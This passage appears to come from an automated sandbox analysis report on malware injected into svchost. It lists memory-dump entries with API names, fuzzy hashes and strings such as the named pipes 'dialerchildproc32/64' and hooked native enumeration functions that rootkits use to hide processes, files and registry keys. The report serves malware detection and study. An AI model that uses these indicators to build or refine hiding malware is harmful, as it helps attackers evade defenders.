                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 0a117424bb8ec17e06fa24497d1726645dd05d6d29179111a98c9b800477247c
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: D1318274142E4EE0FB17EFE9E871AE463E3B714398FC450139449B2E759E78824AD760

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: ceb190c1bc5cb76a39468d0dcf2336ec5ebfdbce9e152840d3fa6cc9d2bd33da
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 6381CE72704E41C6FB52ABE594713D926E3EB96B80F548025EA0577F96EF38C84A8F00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000195DD5CCE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEBC
                                                                                • SetLastError.KERNEL32 ref: 00000195DD5CCED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000195DD5CECCC,?,?,?,?,00000195DD5CBF9F,?,?,?,?,?,00000195DD5C7AB0), ref: 00000195DD5CCF2C
                                                                                  • Part of subcall function 00000195DD5CD6CC: HeapAlloc.KERNEL32 ref: 00000195DD5CD721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF54
                                                                                  • Part of subcall function 00000195DD5CD744: HeapFree.KERNEL32 ref: 00000195DD5CD75A
                                                                                  • Part of subcall function 00000195DD5CD744: GetLastError.KERNEL32 ref: 00000195DD5CD764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF76
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: 5deeaa700c7bca527ac3e0ef52b0542e40d86773dc9f6c8a69b3fdc468513023
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: B5412034303E4C82FB6BA7EE59753F913C35B857B4F140724A936E6ED6DE2894818700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: ef64e02e287f94d0d9415c348699ab4dc805c8a96bd9a803ab77d90ce42376f4
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: 09217932614B4483FB118BA5F4647AA73E2F789BA5F544215EA5953FA8CF3CC14ACB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                                • Instruction ID: 9c2520efcc87ac771d522e1eb6396a81ecb0ce0daac719ccbdf896b70f129e44
                                                                                • Opcode Fuzzy Hash: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                                • Instruction Fuzzy Hash: 07E18D72606B488AEB32DFA9D4913DD7BE2F745B98F100115EE89A7F99CB35C481CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: 8578d22811c705561b9a0c63265d0fa22d72dfafe6aec0b6b4f758a2598a20e0
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 3EE18C72604B40CAEB62DBA5D4A03DD7BE2F756B98F142116EE8967F99CB34C191CF00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                                • Instruction ID: f94411bdc3c5adc3673d068f26baf74004ea3de06b1d5fa0a00e338998d396b5
                                                                                • Opcode Fuzzy Hash: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                                • Instruction Fuzzy Hash: 4741B236313E0492EB17DB9AA8647D623E7BB45BA0F494125DD0AE7F84EE3CC44A8350

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 85125c25dfd785958ae00b37ce84ac9a8513cd9fd1755175fa0b0cf5bc826ac5
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: CC418C33214F88C6E761CFA5E45479A77E2F389B89F048129DA8957B58DF3CC489CB00
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: b29a2c01b9a529d3d397189201e4ebb9e472c9377beb16884566e216c47c93f0
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: 47112134707A8881FB6A67AF59717E963C35B847F0F1443269839F6EDAEE28C5428700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: db17aeae78a532267f4925ec03955f9628ff8aa19b2b3ce37216714fce8ee9dc
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 7281A031602E0F86FB63ABEE98713D967D3AB45780F145415DA05F7F96EB78C8868700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                                • Instruction ID: 8d15efdb5329dbd6f8d908350e729aaeb4b7b6a33fa5c2f06519c4c6539ee195
                                                                                • Opcode Fuzzy Hash: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                                • Instruction Fuzzy Hash: 0E31E531213E04D1EF13DBCAA4207D523D6B759BA1F590625DD1EABB98EF38C245C710
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 900ef7d4bcd6fd2864e51168dc1007f1dfbbe5e213ae5e9ff28ad5abe65b03b1
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 2C11BF32310F4086E7629B96E8643A9B3E1F788FE5F044224EA1A97B94CF78C8058750
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 42188e63fbb78b0732cb93c59acbf515d5b68af2c84de3977fd9872ca41c66e2
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 38118E36302F4982FF559B95F4242A963F2F749B85F040028DE8953B94EF3DC545C714
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 195e277db55ff97f3f99f451c10649e3fcd3ec1e2be31b8428dbef89db2187c3
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: 12D17876205F8882DB71DB9AE4A439A77E1F388B84F500116EA8E97FA5DF3CC551CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: fc4c9099da629ec678108cb9cb41e40dfa530a30d66993f12becd6c4ba3f9dba
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: 0C317036702F5DC2E716DF9AE561BA977E2FB44B84F084020DE48A7F55EB34C4A18740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: 8fdc15ff09e63732eb275527d3260f2eb5a265f6af426b64fb26ff3aadc1099c
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: C9115E34203E4882FB66A7AE59757B963C39B847B4F144725A836F6FD6EE6884428700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 094941dede99f9d048632fe007c60956db5d273133d38dce1c9db68577c35704
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: F4018C31300E4882EB11DB92A86879963E2F788FC1F884035DE4DA3B54DF3CC98AC750
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: a4c37ed03e2153ec921c4fe35d3b930d694565bbf9533148a8bdd7b871a42841
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 00014075312F4882FF269BA6E82879573E2BB45B86F040424CE4967B54EF3DC149C710
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                                • Instruction ID: b6a9a57366d7e32ba7d8204e1a09c4ae5b67336b6113bd5d1bf03962d45849d0
                                                                                • Opcode Fuzzy Hash: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                                • Instruction Fuzzy Hash: FD51E732703A088AEB16CF59E469BD837D7F34AB89F518124DA06A3B8CDB75C841CB44
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 3343c703fad3ff3a8a0055ce76d4c8b5bb2113134d4bfc35ff936db91a6087cf
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 3931D132202A44C6E716DF5AE86879937E6F745BCAF058014EE46A7B8DDB39C941CB04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: df346fd54c246db8dc1c541bbdd1f0d6174768352badab0d676f886130502b32
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 2BF04432304A4592E7618BA5F8A479967E2F748BD8F844021DA4957E54DF3CC64ECB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 9bf27a7e66860d5ed9a1e4fc62765c01fea6d54f0cf7a99623ebd25812deed3f
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: FFF01C75715F8882FB158F97B92419967E2AB48FD1F089131EE4A67F28DF3CC4868710
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: 6fff49532d995f645c10438cf692a88e56ff7661239a114b43dcc12d8e254882
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 9BF09675311F0981EF118BA8E46439963E2EB857A1F540219CA6A56BE4DF3CC546C310
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
